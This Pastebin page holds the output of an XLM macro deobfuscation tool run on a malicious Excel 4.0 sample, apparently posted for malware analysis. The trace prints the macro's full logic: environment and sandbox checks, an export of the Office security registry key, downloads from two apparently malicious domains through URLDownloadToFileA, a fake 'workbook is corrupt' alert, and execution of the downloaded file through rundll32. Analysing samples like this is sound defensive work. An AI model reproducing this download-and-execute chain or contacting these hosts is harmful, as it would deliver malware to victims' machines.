API tools faq
paste
dissectmalware

sample - macro

dissectmalware
May 24th, 2020
342
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 17.36 KB | None | 0 0
raw download clone embed print report
  1. _ _______
  2. |\ /|( \ ( )
  3. ( \ / )| ( | () () |
  4. \ (_) / | | | || || |
  5. ) _ ( | | | |(_)| |
  6. / ( ) \ | | | | | |
  7. ( / \ )| (____/\| ) ( |
  8. |/ \|(_______/|/ \|
  9. ______ _______ _______ ______ _______ _______ _______ _______ _________ _______ _______
  10. ( __ \ ( ____ \( ___ )( ___ \ ( ____ \|\ /|( ____ \( ____ \( ___ )\__ __/( ___ )( ____ )
  11. | ( \ )| ( \/| ( ) || ( ) )| ( \/| ) ( || ( \/| ( \/| ( ) | ) ( | ( ) || ( )|
  12. | | ) || (__ | | | || (__/ / | (__ | | | || (_____ | | | (___) | | | | | | || (____)|
  13. | | | || __) | | | || __ ( | __) | | | |(_____ )| | | ___ | | | | | | || __)
  14. | | ) || ( | | | || ( \ \ | ( | | | | ) || | | ( ) | | | | | | || (\ (
  15. | (__/ )| (____/\| (___) || )___) )| ) | (___) |/\____) || (____/\| ) ( | | | | (___) || ) \ \__
  16. (______/ (_______/(_______)|/ \___/ |/ (_______)\_______)(_______/|/ \| )_( (_______)|/ \__/
  17.  
  18.  
  19. XLMMacroDeobfuscator(v 0.1.3) - https://github.com/DissectMalware/XLMMacroDeobfuscator
  20.  
  21. File: C:\Users\user\Downloads\33719faebf43bf99964ae15582a7dbbfe42605a203c7725913fb4c6bbf69d69f
  22.  
  23. [Loading Cells]
  24. auto_open: auto_open->Sheet2!$HT$59712
  25. [Starting Deobfuscation]
  26. CELL:HT59712 , FullEvaluation , SET.VALUE(Sheet2!IJ9596,-384)
  27. CELL:HT59713 , FullEvaluation , GOTO(AG21387)
  28. CELL:AG21387 , FullEvaluation , SET.VALUE(Sheet2!GY52195,-50.25)
  29. CELL:AG21388 , FullEvaluation , RUN(Sheet2!HU17490)
  30. CELL:HU17490 , FullEvaluation , SET.VALUE(Sheet2!II36015,-424)
  31. CELL:HU17491 , FullEvaluation , RUN(Sheet2!DX56863)
  32. CELL:DX56863 , FullEvaluation , SET.VALUE(Sheet2!AN30204,15)
  33. CELL:DX56864 , FullEvaluation , GOTO(AL48276)
  34. CELL:AL48276 , FullEvaluation , SET.VALUE(Sheet2!HB58617,-378)
  35. CELL:AL48277 , FullEvaluation , GOTO(HE48767)
  36. CELL:HE48767 , FullEvaluation , SET.VALUE(Sheet2!AZ18076,348)
  37. CELL:HE48768 , FullEvaluation , RUN(Sheet2!GC38061)
  38. CELL:GC38061 , FullEvaluation , SET.VALUE(Sheet2!ED33513,-244)
  39. CELL:GC38062 , FullEvaluation , RUN(Sheet2!GK49742)
  40. CELL:GK49742 , FullEvaluation , SET.VALUE(Sheet2!GV40795,479)
  41. CELL:GK49743 , FullEvaluation , RUN(Sheet2!DK20776)
  42. CELL:DK20776 , FullEvaluation , SET.VALUE(Sheet2!FP3792,-59)
  43. CELL:DK20777 , FullEvaluation , RUN(Sheet2!DK24943)
  44. CELL:DK24943 , FullEvaluation , SET.VALUE(Sheet2!HN2684,-218)
  45. CELL:DK24944 , FullEvaluation , RUN(Sheet2!BB26751)
  46. CELL:BB26751 , FullEvaluation , FORMULA("=CLOSE(FALSE)",Sheet2!HQ31495)
  47. CELL:BB26752 , FullEvaluation , GOTO(GU63993)
  48. CELL:GU63993 , FullEvaluation , FORMULA("=APP.MAXIMIZE()",Sheet2!GU63994)
  49. CELL:GU63994 , PartialEvaluation , APP.MAXIMIZE()
  50. CELL:GU63995 , FullEvaluation , GOTO(DY16980)
  51. CELL:DY16980 , FullEvaluation , FORMULA("=IF(GET.WINDOW(7),GOTO(R[14514]C[96]),)",Sheet2!DY16981)
  52. CELL:DY16981 , FullEvaluation , IF(GET.WINDOW(7),GOTO(R[14514]C[96]),)
  53. CELL:DY16982 , FullEvaluation , RUN(Sheet2!X59768)
  54. CELL:X59768 , FullEvaluation , FORMULA("=IF(GET.WINDOW(20),,GOTO(R[-28274]C[201]))",Sheet2!X59769)
  55. CELL:X59769 , FullEvaluation , IF(GET.WINDOW(20),,GOTO(R[-28274]C[201]))
  56. CELL:X59770 , FullEvaluation , GOTO(N10466)
  57. CELL:N10466 , FullEvaluation , FORMULA("=IF(GET.WINDOW(23)<3,GOTO(R[21028]C[211]),)",Sheet2!N10467)
  58. CELL:N10467 , FullEvaluation , IF(GET.WINDOW(23)<3,GOTO(R[21028]C[211]),)
  59. CELL:N10468 , FullEvaluation , GOTO(DA11989)
  60. CELL:DA11989 , FullEvaluation , FORMULA("=IF(GET.WORKSPACE(31),GOTO(R[19505]C[120]),)",Sheet2!DA11990)
  61. CELL:DA11990 , FullEvaluation , IF(GET.WORKSPACE(31),GOTO(R[19505]C[120]),)
  62. CELL:DA11991 , FullEvaluation , GOTO(GG418)
  63. CELL:GG418 , FullEvaluation , FORMULA("=IF(GET.WORKSPACE(13)<770,GOTO(R[31076]C[36]),)",Sheet2!GG419)
  64. CELL:GG419 , FullEvaluation , IF(GET.WORKSPACE(13)<770,GOTO(R[31076]C[36]),)
  65. CELL:GG420 , FullEvaluation , RUN(Sheet2!FJ54706)
  66. CELL:FJ54706 , FullEvaluation , FORMULA("=IF(GET.WORKSPACE(14)<390,GOTO(R[-23212]C[59]),)",Sheet2!FJ54707)
  67. CELL:FJ54707 , FullEvaluation , IF(GET.WORKSPACE(14)<390,GOTO(R[-23212]C[59]),)
  68. CELL:FJ54708 , FullEvaluation , RUN(Sheet2!DS37251)
  69. CELL:DS37251 , FullEvaluation , FORMULA("=IF(GET.WORKSPACE(19),,GOTO(R[-5757]C[102]))",Sheet2!DS37252)
  70. CELL:DS37252 , FullEvaluation , IF(GET.WORKSPACE(19),,GOTO(R[-5757]C[102]))
  71. CELL:DS37253 , FullEvaluation , GOTO(ED41335)
  72. CELL:ED41335 , FullEvaluation , FORMULA("=IF(GET.WORKSPACE(42),,GOTO(R[-9841]C[91]))",Sheet2!ED41336)
  73. CELL:ED41336 , FullEvaluation , IF(GET.WORKSPACE(42),,GOTO(R[-9841]C[91]))
  74. CELL:ED41337 , FullEvaluation , RUN(Sheet2!AS51609)
  75. CELL:AS51609 , FullEvaluation , FORMULA("=IF(ISNUMBER(SEARCH(""Windows"",GET.WORKSPACE(1))),,GOTO(R[-20115]C[180]))",Sheet2!AS51610)
  76. CELL:AS51610 , FullBranching , IF(ISNUMBER(SEARCH("Windows",GET.WORKSPACE(1))),,GOTO(R[-20115]C[180]))
  77. CELL:AS51610 , FullEvaluation , [TRUE]
  78. CELL:AS51611 , FullEvaluation , GOTO(FA48687)
  79. CELL:FA48687 , FullEvaluation , FORMULA("=""EXPORT HKCU\Software\Microsoft\Office\""",Sheet2!AF47942)
  80. CELL:FA48688 , FullEvaluation , GOTO(FP63244)
  81. CELL:FP63244 , FullEvaluation , FORMULA("=""C:\Users\Public\9P8BL.reg""",Sheet2!FL62273)
  82. CELL:FP63245 , FullEvaluation , RUN(Sheet2!U61287)
  83. CELL:U61287 , FullEvaluation , FORMULA("=R[-15427]C[-64]&GET.WORKSPACE(2)&""\Excel\Security ""&R[-1096]C[72]&"" /y""",Sheet2!CR63369)
  84. CELL:U61288 , FullEvaluation , GOTO(HO48351)
  85. CELL:HO48351 , FullEvaluation , FORMULA("=""C:\Windows\system32\reg.exe""",Sheet2!EP31804)
  86. CELL:HO48352 , FullEvaluation , RUN(Sheet2!HS62292)
  87. CELL:HS62292 , FullEvaluation , FORMULA("=CALL(""Shell32"",""ShellExecuteA"",""JJCCCJJ"",0,""open"",R[-30489]C[-81],R[1076]C[-131],0,5)",Sheet2!HS62293)
  88. CELL:HS62293 , FullEvaluation , CALL("Shell32","ShellExecuteA","JJCCCJJ",0,"open","C:\Windows\system32\reg.exe","GET.WORKSPACE(2)\Excel\Security /y",0,5)
  89. CELL:HS62294 , FullEvaluation , RUN(Sheet2!IH52343)
  90. CELL:IH52343 , FullEvaluation , FORMULA("=WHILE(ISERROR(FILES(R[9927]C[-74])))",Sheet2!IH52346)
  91. CELL:IH52344 , FullEvaluation , FORMULA("=WAIT(NOW()+""00:00:01"")",Sheet2!IH52347)
  92. CELL:IH52345 , FullEvaluation , FORMULA("=NEXT()",Sheet2!IH52348)
  93. CELL:IH52346 , PartialEvaluation , WHILE(ISERROR(FILES("C:\Users\Public\9P8BL.reg")))
  94. CELL:IH52347 , PartialEvaluation , WAIT("NOW()+""00:00:01""")
  95. CELL:IH52348 , PartialEvaluation , NEXT()
  96. CELL:IH52349 , FullEvaluation , RUN(Sheet2!HS55844)
  97. CELL:HS55844 , FullEvaluation , FORMULA("=FOPEN(R[6428]C[-59])",Sheet2!HS55845)
  98. CELL:HS55845 , PartialEvaluation , FOPEN("C:\Users\Public\9P8BL.reg")
  99. CELL:HS55846 , FullEvaluation , RUN(Sheet2!AB41868)
  100. CELL:AB41868 , FullEvaluation , FORMULA("=FPOS(R[13976]C[199],215)",Sheet2!AB41869)
  101. CELL:AB41869 , PartialEvaluation , FPOS("FOPEN(""C:\Users\Public\9P8BL.reg"")",215)
  102. CELL:AB41870 , FullEvaluation , RUN(Sheet2!HA21230)
  103. CELL:HA21230 , FullEvaluation , FORMULA("=FREAD(R[34614]C[18],255)",Sheet2!HA21231)
  104. CELL:HA21231 , PartialEvaluation , FREAD("FOPEN(""C:\Users\Public\9P8BL.reg"")",255)
  105. CELL:HA21232 , FullEvaluation , RUN(Sheet2!AM17289)
  106. CELL:AM17289 , FullEvaluation , FORMULA("=FCLOSE(R[38555]C[188])",Sheet2!AM17290)
  107. CELL:AM17290 , PartialEvaluation , FCLOSE("FOPEN(""C:\Users\Public\9P8BL.reg"")")
  108. CELL:AM17291 , FullEvaluation , GOTO(CJ61198)
  109. CELL:CJ61198 , FullEvaluation , FORMULA("=FILE.DELETE(R[1074]C[80])",Sheet2!CJ61199)
  110. CELL:CJ61199 , PartialEvaluation , FILE.DELETE("C:\Users\Public\9P8BL.reg")
  111. CELL:CJ61200 , FullEvaluation , RUN(Sheet2!HL8081)
  112. CELL:HL8081 , FullEvaluation , FORMULA("=IF(ISNUMBER(SEARCH(""0001"",R[13149]C[-11])),GOTO(R[23413]C[5]),)",Sheet2!HL8082)
  113. CELL:HL8082 , FullBranching , IF(ISNUMBER(SEARCH("0001",R[13149]C[-11])),GOTO(R[23413]C[5]),)
  114. CELL:HL8082 , FullEvaluation , [TRUE] GOTO(R[23413]C[5])
  115. CELL:HQ31495 , End , CLOSE(FALSE)
  116. CELL:HL8082 , FullEvaluation , [FALSE]
  117. CELL:HL8083 , FullEvaluation , RUN(Sheet2!BG35275)
  118. CELL:BG35275 , FullEvaluation , FORMULA("=""C:\Users\Public\IYNI.html""",Sheet2!L38143)
  119. CELL:BG35276 , FullEvaluation , GOTO(DG2112)
  120. CELL:DG2112 , FullEvaluation , FORMULA("=""https://docs.microsoft.com/en-us/officeupdates/office-msi-non-security-updates""",Sheet2!FU50289)
  121. CELL:DG2113 , FullEvaluation , RUN(Sheet2!AE58006)
  122. CELL:AE58006 , FullEvaluation , FORMULA("=CALL(""urlmon"",""URLDownloadToFileA"",""JJCCJJ"",0,R[-7718]C[146],R[-19864]C[-19],0,0)",Sheet2!AE58007)
  123. CELL:AE58007 , FullEvaluation , CALL("urlmon","URLDownloadToFileA","JJCCJJ",0,"https://docs.microsoft.com/en-us/officeupdates/office-msi-non-security-updates","C:\Users\Public\IYNI.html",0,0)
  124. CELL:AE58008 , FullEvaluation , GOTO(HH2203)
  125. CELL:HH2203 , FullEvaluation , FORMULA("=FILES(R[35939]C[-204])",Sheet2!HH2204)
  126. CELL:HH2204 , PartialEvaluation , FILES("C:\Users\Public\IYNI.html")
  127. CELL:HH2205 , FullEvaluation , RUN(Sheet2!GU20999)
  128. CELL:GU20999 , FullEvaluation , FORMULA("=IF(ISERROR(R[-18796]C[13]),GOTO(R[10495]C[22]),)",Sheet2!GU21000)
  129. CELL:GU21000 , FullBranching , IF(ISERROR(R[-18796]C[13]),GOTO(R[10495]C[22]),)
  130. CELL:GU21000 , FullEvaluation , [TRUE] GOTO(R[10495]C[22])
  131. CELL:HQ31495 , End , CLOSE(FALSE)
  132. CELL:GU21000 , FullEvaluation , [FALSE]
  133. CELL:GU21001 , FullEvaluation , RUN(Sheet2!GP10315)
  134. CELL:GP10315 , FullEvaluation , SET.VALUE(Sheet2!A1626,214)
  135. CELL:GP10316 , FullEvaluation , GOTO(CQ36304)
  136. CELL:CQ36304 , FullEvaluation , SET.VALUE(Sheet2!IM10026,-162)
  137. CELL:CQ36305 , FullEvaluation , RUN(Sheet2!C21349)
  138. CELL:C21349 , FullEvaluation , SET.VALUE(Sheet2!DB6239,-293)
  139. CELL:C21350 , FullEvaluation , RUN(Sheet2!HD9329)
  140. CELL:HD9329 , FullEvaluation , SET.VALUE(Sheet2!AT45907,-65)
  141. CELL:HD9330 , FullEvaluation , GOTO(GI63368)
  142. CELL:GI63368 , FullEvaluation , SET.VALUE(Sheet2!AH38851,-52.25)
  143. CELL:GI63369 , FullEvaluation , GOTO(ET46416)
  144. CELL:ET46416 , FullEvaluation , SET.VALUE(Sheet2!BW44660,-36)
  145. CELL:ET46417 , FullEvaluation , RUN(Sheet2!BU4702)
  146. CELL:BU4702 , FullEvaluation , SET.VALUE(Sheet2!IJ26702,83)
  147. CELL:BU4703 , FullEvaluation , RUN(Sheet2!HK45441)
  148. CELL:HK45441 , FullEvaluation , SET.VALUE(Sheet2!HX58665,235)
  149. CELL:HK45442 , FullEvaluation , GOTO(CP20663)
  150. CELL:CP20663 , FullEvaluation , SET.VALUE(Sheet2!CI20337,17.5)
  151. CELL:CP20664 , FullEvaluation , RUN(Sheet2!IF25037)
  152. CELL:IF25037 , FullEvaluation , SET.VALUE(Sheet2!IU16716,430)
  153. CELL:IF25038 , FullEvaluation , RUN(Sheet2!DK58580)
  154. CELL:DK58580 , FullEvaluation , FORMULA("=""C:\Users\Public\NvZsap.html""",Sheet2!HL64438)
  155. CELL:DK58581 , FullEvaluation , GOTO(BU10983)
  156. CELL:BU10983 , FullEvaluation , FORMULA("=""https://activediscounts.club/wp-data.php""",Sheet2!CM18954)
  157. CELL:BU10984 , FullEvaluation , RUN(Sheet2!BC4497)
  158. CELL:BC4497 , FullEvaluation , FORMULA("=CALL(""urlmon"",""URLDownloadToFileA"",""JJCCJJ"",0,R[-17736]C[-13],R[27748]C[116],0,0)",Sheet2!CZ36690)
  159. CELL:BC4498 , FullEvaluation , GOTO(CW5342)
  160. CELL:CW5342 , FullEvaluation , FORMULA("=FILES(R[114]C[150])",Sheet2!BR64324)
  161. CELL:CW5343 , FullEvaluation , RUN(Sheet2!DJ35113)
  162. CELL:DJ35113 , FullEvaluation , FORMULA("=IF(ISERROR(R[46031]C[-28]),,RUN(R[-6570]C[-83]))",Sheet2!CT18293)
  163. CELL:DJ35114 , FullEvaluation , RUN(Sheet2!EI26842)
  164. CELL:EI26842 , FullEvaluation , FORMULA("=""https://hackcheatsonline.club/wp-data.php""",Sheet2!T16882)
  165. CELL:EI26843 , FullEvaluation , RUN(Sheet2!IC16090)
  166. CELL:IC16090 , FullEvaluation , FORMULA("=CALL(""urlmon"",""URLDownloadToFileA"",""JJCCJJ"",0,R[-28101]C[-88],R[19455]C[112],0,0)",Sheet2!DD44983)
  167. CELL:IC16091 , FullEvaluation , GOTO(FY11752)
  168. CELL:FY11752 , FullEvaluation , FORMULA("=""The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.""",Sheet2!AU55970)
  169. CELL:FY11753 , FullEvaluation , GOTO(EU6902)
  170. CELL:EU6902 , FullEvaluation , FORMULA("=ALERT(R[44247]C[32])",Sheet2!O11723)
  171. CELL:EU6903 , FullEvaluation , GOTO(GP57037)
  172. CELL:GP57037 , FullEvaluation , FORMULA("=""C:\Windows\system32\rundll32.exe""",Sheet2!DX21867)
  173. CELL:GP57038 , FullEvaluation , RUN(Sheet2!DT43174)
  174. CELL:DT43174 , FullEvaluation , FORMULA("=R[58909]C[191]&"",DllRegisterServer""",Sheet2!AC5529)
  175. CELL:DT43175 , FullEvaluation , GOTO(AV52824)
  176. CELL:AV52824 , FullEvaluation , FORMULA("=CALL(""Shell32"",""ShellExecuteA"",""JJCCCJJ"",0,""open"",R[14289]C[-123],R[-2049]C[-222],0,5)",Sheet2!IQ7578)
  177. CELL:AV52825 , FullEvaluation , RUN(Sheet2!CZ36690)
  178. CELL:CZ36690 , FullEvaluation , CALL("urlmon","URLDownloadToFileA","JJCCJJ",0,"https://activediscounts.club/wp-data.php","C:\Users\Public\NvZsap.html",0,0)
  179. CELL:CZ36691 , FullEvaluation , GOTO(BR64324)
  180. CELL:BR64324 , PartialEvaluation , FILES("C:\Users\Public\NvZsap.html")
  181. CELL:BR64325 , FullEvaluation , GOTO(CT18293)
  182. CELL:CT18293 , FullBranching , IF(ISERROR(R[46031]C[-28]),,RUN(R[-6570]C[-83]))
  183. CELL:CT18293 , FullEvaluation , [TRUE]
  184. CELL:CT18294 , FullEvaluation , GOTO(T16882)
  185. CELL:T16882 , FullEvaluation , "https://hackcheatsonline.club/wp-data.php"
  186. CELL:T16883 , FullEvaluation , GOTO(DD44983)
  187. CELL:DD44983 , FullEvaluation , CALL("urlmon","URLDownloadToFileA","JJCCJJ",0,"https://hackcheatsonline.club/wp-data.php","C:\Users\Public\NvZsap.html",0,0)
  188. CELL:DD44984 , FullEvaluation , GOTO(AU55970)
  189. CELL:AU55970 , FullEvaluation , "The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt."
  190. CELL:AU55971 , FullEvaluation , GOTO(O11723)
  191. CELL:O11723 , PartialEvaluation , ALERT("The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.")
  192. CELL:O11724 , FullEvaluation , RUN(Sheet2!DX21867)
  193. CELL:DX21867 , FullEvaluation , "C:\Windows\system32\rundll32.exe"
  194. CELL:DX21868 , FullEvaluation , RUN(Sheet2!AC5529)
  195. CELL:AC5529 , FullEvaluation , "C:\Users\Public\NvZsap.html,DllRegisterServer"
  196. CELL:AC5530 , FullEvaluation , RUN(Sheet2!IQ7578)
  197. CELL:IQ7578 , FullEvaluation , CALL("Shell32","ShellExecuteA","JJCCCJJ",0,"open","C:\Windows\system32\rundll32.exe","C:\Users\Public\NvZsap.html,DllRegisterServer",0,5)
  198. CELL:IQ7579 , FullEvaluation , GOTO(HQ31495)
  199. CELL:HQ31495 , End , CLOSE(FALSE)
  200. CELL:CT18293 , FullEvaluation , [FALSE] RUN(Sheet2!O11723)
  201. CELL:O11723 , PartialEvaluation , ALERT("The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.")
  202. CELL:O11724 , FullEvaluation , RUN(Sheet2!DX21867)
  203. CELL:DX21867 , FullEvaluation , "C:\Windows\system32\rundll32.exe"
  204. CELL:DX21868 , FullEvaluation , RUN(Sheet2!AC5529)
  205. CELL:AC5529 , FullEvaluation , "C:\Users\Public\NvZsap.html,DllRegisterServer"
  206. CELL:AC5530 , FullEvaluation , RUN(Sheet2!IQ7578)
  207. CELL:IQ7578 , FullEvaluation , CALL("Shell32","ShellExecuteA","JJCCCJJ",0,"open","C:\Windows\system32\rundll32.exe","C:\Users\Public\NvZsap.html,DllRegisterServer",0,5)
  208. CELL:IQ7579 , FullEvaluation , GOTO(HQ31495)
  209. CELL:HQ31495 , End , CLOSE(FALSE)
  210. CELL:AS51610 , FullEvaluation , [FALSE] GOTO(R[-20115]C[180])
  211. CELL:HQ31495 , End , CLOSE(FALSE)
  212. [END of Deobfuscation]
  213. time elapsed: 5.855288743972778
Add Comment
Please, Sign In to add comment
Public Pastes
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!